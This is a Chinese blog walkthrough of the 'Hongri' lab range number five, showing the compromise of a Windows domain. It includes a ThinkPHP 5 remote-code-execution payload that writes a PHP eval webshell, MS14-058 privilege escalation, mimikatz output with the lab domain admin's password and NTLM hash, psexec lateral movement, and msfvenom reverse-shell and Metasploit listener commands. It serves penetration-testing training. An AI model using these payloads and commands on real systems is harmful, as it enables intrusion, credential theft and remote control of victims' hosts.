红日靶场(五)渗透

红日靶场五

感觉这个比前面几个简单一点(bushi)

解法一:

全程用CS做,配合一些插件比较容易可以做

首先扫一下开放了哪些端口

nmap -sS 192.168.111.150 -T4 -Pn
Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-09 14:00 +0800
Nmap scan report for 192.168.111.150
Host is up (0.070s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 7.49 seconds

开放了80和3306,开放的端口不多,先看看80上跑的是什么服务

image-20260709165944417

可以看到是ThinkPHP V5,知道版本后可以搜索一下有没有什么现成可以利用的CVE

找到了这个ThinkPHP 5.x 远程代码执行漏洞

可以验证漏洞存在

image-20260709170309247

但按照上面文章中的方法写webshell写不进去,所以参考了另外一篇: ThinkPHP5系列远程代码执行漏洞复现getshell

payload:s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=1.php&vars[1][]=<?php @eval($_POST['1qaz']);?>

image-20260709170613137

连接上webshell之后就可以上线CS了

上线后发现这是一台windows主机,权限是Administrator

image-20260709170901868

先看看主机信息

 beacon> shell systeminfo
 [*] Tasked beacon to run: systeminfo
 [+] host called home, sent: 41 bytes
 [+] received output:

主机名:           WIN7
OS 名称:          Microsoft Windows 7 专业版 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          成员工作站
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:       
产品 ID:          00371-177-0000061-85581
初始安装日期:     2020/3/5, 0:44:56
系统启动时间:     2026/7/9, 5:53:33
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 1 个处理器。
                  [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2200 Mhz
BIOS 版本:        Phoenix Technologies LTD 6.00, 2020/11/12
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     2,047 MB
可用的物理内存:   1,477 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用:   3,300 MB
虚拟内存: 使用中: 795 MB
页面文件位置:     C:\pagefile.sys
:               sun.com
登录服务器:       暂缺
修补程序:         暂缺
网卡:             安装了 2 个 NIC。
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      wk1 waiwang
                      启用 DHCP:   否
                      IP 地址
                        [01]: 192.168.111.150
                        [02]: fe80::74ff:9ed7:53ab:d404
                  [02]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接
                      启用 DHCP:   否
                      IP 地址
                        [01]: 192.168.138.136
                        [02]: fe80::edf4:9135:b0e6:cfc4

image-20260709171150311

可以使用MS14-058提权

image-20260709171350956

shell回连

image-20260709171512757

现在已经提升至system权限,现在可以尝试探测内网了

image-20260709171921420

域内只有一台主机(但我看其他WP里写是有两台,应该是我的问题)

image-20260709171712637

但有多个账户,我们需要横向到域控的system

查看一下域控IP

image-20260709172316162

可以看到这是一台多网卡主机,域控IP 192.168.138.138

用fscan扫一下

先上传fscan

image-20260709172538777

然后进行扫描

image-20260709172443652

开放了445端口,似乎可以用永恒之蓝,但CS上不太好操作~~(也可能是因为我不会)~~

所以我们用mimikatz : mimikatz sekurlsa::logonpasswords

[07/09 15:53:56] beacon> mimikatz sekurlsa::logonpasswords
[07/09 15:53:56] [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[07/09 15:53:56] [+] host called home, sent: 788090 bytes
[07/09 15:53:58] [+] received output:

Authentication Id : 0 ; 131439 (00000000:0002016f)
Session           : Batch from 0
User Name         : Administrator
Domain            : SUN
Logon Server      : DC
Logon Time        : 2026/7/9 5:54:08
SID               : S-1-5-21-3388020223-1982701712-4030140183-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : SUN
	 * LM       : c8c42d085b5e3da2e9260223765451f1
	 * NTLM     : e8bea972b3549868cecd667a64a6ac46
	 * SHA1     : 3688af445e35efd8a4d4e0a9eb90b754a2f3a4ee
	tspkg :	
	 * Username : Administrator
	 * Domain   : SUN
	 * Password : dc123.com
	wdigest :	
	 * Username : Administrator
	 * Domain   : SUN
	 * Password : dc123.com
	kerberos :	
	 * Username : Administrator
	 * Domain   : SUN.COM
	 * Password : dc123.com
	ssp :	
	credman :	
	 [00000000]
	 * Username : SUN\Administrator
	 * Domain   : SUN\Administrator
	 * Password : dc123.com

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2026/7/9 5:53:50
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN7$
Domain            : SUN
Logon Server      : (null)
Logon Time        : 2026/7/9 5:53:50
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : WIN7$
	 * Domain   : SUN
	 * NTLM     : 57a7c3c04367ee520cc20f7fcd52ca72
	 * SHA1     : e78f8e8508562dafdb9ef67743f37cad7c7a8db1
	tspkg :	
	wdigest :	
	 * Username : WIN7$
	 * Domain   : SUN
	 * Password : 5a a8 6b 7a 0c 89 7d 82 02 3b aa b5 14 80 25 8e 16 21 3d a0 45 ac 96 a2 be 9b d5 6a d1 5b 12 4c 47 fb 97 b1 5b 87 c3 f1 14 87 56 90 0c 1c 80 16 ea de 26 b9 5a 64 61 d0 f1 9a a5 b9 b9 f7 17 f0 d0 98 22 e6 77 cc b2 55 b3 11 39 a2 4c 07 07 1a 38 ca 8d af f7 c8 a1 1d 18 fd 80 34 20 7c 84 3e 4d f3 46 b0 47 d3 2a 97 fd 18 0d 0c 95 d2 ec 87 ba 88 32 da 0f e0 3b c8 d5 0a d3 47 d4 2e 8f 1b 23 41 ff 20 3d 81 f4 5f bf 04 bd 4a d9 4f cd 03 53 24 68 ff 88 23 ad 33 b1 6e 1e 88 b9 1d 1f 3b 72 e3 2e 29 6c f0 ea 77 bd 14 56 5a 3d ba 59 ed 7c ba 98 6e 15 4d 1a d0 97 1d 26 04 88 d2 b5 4c ee fe 09 dc 1c df 76 0c 2e be 09 57 43 b2 c4 9d 39 a4 86 28 df 36 03 48 61 a9 e5 04 4c 41 fe 4a 09 81 33 1d da db 48 5a ed 55 20 53 95 76 9f 3d 
	kerberos :	
	 * Username : win7$
	 * Domain   : SUN.COM
	 * Password : 5a a8 6b 7a 0c 89 7d 82 02 3b aa b5 14 80 25 8e 16 21 3d a0 45 ac 96 a2 be 9b d5 6a d1 5b 12 4c 47 fb 97 b1 5b 87 c3 f1 14 87 56 90 0c 1c 80 16 ea de 26 b9 5a 64 61 d0 f1 9a a5 b9 b9 f7 17 f0 d0 98 22 e6 77 cc b2 55 b3 11 39 a2 4c 07 07 1a 38 ca 8d af f7 c8 a1 1d 18 fd 80 34 20 7c 84 3e 4d f3 46 b0 47 d3 2a 97 fd 18 0d 0c 95 d2 ec 87 ba 88 32 da 0f e0 3b c8 d5 0a d3 47 d4 2e 8f 1b 23 41 ff 20 3d 81 f4 5f bf 04 bd 4a d9 4f cd 03 53 24 68 ff 88 23 ad 33 b1 6e 1e 88 b9 1d 1f 3b 72 e3 2e 29 6c f0 ea 77 bd 14 56 5a 3d ba 59 ed 7c ba 98 6e 15 4d 1a d0 97 1d 26 04 88 d2 b5 4c ee fe 09 dc 1c df 76 0c 2e be 09 57 43 b2 c4 9d 39 a4 86 28 df 36 03 48 61 a9 e5 04 4c 41 fe 4a 09 81 33 1d da db 48 5a ed 55 20 53 95 76 9f 3d 
	ssp :	
	credman :	

Authentication Id : 0 ; 46412 (00000000:0000b54c)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2026/7/9 5:53:45
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : WIN7$
	 * Domain   : SUN
	 * NTLM     : 57a7c3c04367ee520cc20f7fcd52ca72
	 * SHA1     : e78f8e8508562dafdb9ef67743f37cad7c7a8db1
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN7$
Domain            : SUN
Logon Server      : (null)
Logon Time        : 2026/7/9 5:53:45
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN7$
	 * Domain   : SUN
	 * Password : 5a a8 6b 7a 0c 89 7d 82 02 3b aa b5 14 80 25 8e 16 21 3d a0 45 ac 96 a2 be 9b d5 6a d1 5b 12 4c 47 fb 97 b1 5b 87 c3 f1 14 87 56 90 0c 1c 80 16 ea de 26 b9 5a 64 61 d0 f1 9a a5 b9 b9 f7 17 f0 d0 98 22 e6 77 cc b2 55 b3 11 39 a2 4c 07 07 1a 38 ca 8d af f7 c8 a1 1d 18 fd 80 34 20 7c 84 3e 4d f3 46 b0 47 d3 2a 97 fd 18 0d 0c 95 d2 ec 87 ba 88 32 da 0f e0 3b c8 d5 0a d3 47 d4 2e 8f 1b 23 41 ff 20 3d 81 f4 5f bf 04 bd 4a d9 4f cd 03 53 24 68 ff 88 23 ad 33 b1 6e 1e 88 b9 1d 1f 3b 72 e3 2e 29 6c f0 ea 77 bd 14 56 5a 3d ba 59 ed 7c ba 98 6e 15 4d 1a d0 97 1d 26 04 88 d2 b5 4c ee fe 09 dc 1c df 76 0c 2e be 09 57 43 b2 c4 9d 39 a4 86 28 df 36 03 48 61 a9 e5 04 4c 41 fe 4a 09 81 33 1d da db 48 5a ed 55 20 53 95 76 9f 3d 
	kerberos :	
	 * Username : win7$
	 * Domain   : SUN.COM
	 * Password : 5a a8 6b 7a 0c 89 7d 82 02 3b aa b5 14 80 25 8e 16 21 3d a0 45 ac 96 a2 be 9b d5 6a d1 5b 12 4c 47 fb 97 b1 5b 87 c3 f1 14 87 56 90 0c 1c 80 16 ea de 26 b9 5a 64 61 d0 f1 9a a5 b9 b9 f7 17 f0 d0 98 22 e6 77 cc b2 55 b3 11 39 a2 4c 07 07 1a 38 ca 8d af f7 c8 a1 1d 18 fd 80 34 20 7c 84 3e 4d f3 46 b0 47 d3 2a 97 fd 18 0d 0c 95 d2 ec 87 ba 88 32 da 0f e0 3b c8 d5 0a d3 47 d4 2e 8f 1b 23 41 ff 20 3d 81 f4 5f bf 04 bd 4a d9 4f cd 03 53 24 68 ff 88 23 ad 33 b1 6e 1e 88 b9 1d 1f 3b 72 e3 2e 29 6c f0 ea 77 bd 14 56 5a 3d ba 59 ed 7c ba 98 6e 15 4d 1a d0 97 1d 26 04 88 d2 b5 4c ee fe 09 dc 1c df 76 0c 2e be 09 57 43 b2 c4 9d 39 a4 86 28 df 36 03 48 61 a9 e5 04 4c 41 fe 4a 09 81 33 1d da db 48 5a ed 55 20 53 95 76 9f 3d 
	ssp :	
	credman :	

直接抓到了域管理员 SUN\Administrator 的明文密码 dc123.com 和 NTLM 哈希 e8bea972b3549868cecd667a64a6ac46。这意味着已经完全控制域,可以立刻接管域控。

先创建一个监听器

image-20260709173013575

注入令牌

image-20260709173137639

通过psexec 派生会话,等待回连

image-20260709173232256

成功拿下域控

image-20260709173354096

image-20260709173453224

读取flag

image-20260709173506625

解法二(未成功)

全程只使用msf

建立webshell的过程是相同的,直接进行内网渗透

先用msf生成一个木马

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.111.25 LPORT=4444 -f exe -o exp.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.25 LPORT=4444 -f exe -o exp2.exe #这个更好用

image-20260709174458968

上传image-20260709174542451

启动msf监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run

image-20260709180449290

拿到shell后查看权限

image-20260709174827666

查看主机信息

image-20260709175409501

使用MS14-058提权,用windows/meterpreter/reverse_tcp有一个坏处是默认是32位的payload,后面进行提权的时候要进行进程迁移,以及指定架构

sessions -i 1 # 进入会话
ps 列出进程
migrate <64位进程PID>  # 迁移进程

image-20260709181657913

msf exploit(windows/local/ms14_058_track_popup_menu) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Windows x86
    1   Windows x64


msf exploit(windows/local/ms14_058_track_popup_menu) > set target 1
target => 1

但我这里怎么都无法拿到shell,先到此为止了(

Licensed under CC BY-NC-SA 4.0
Build by Oight
使用 Hugo 构建
主题 StackJimmy 设计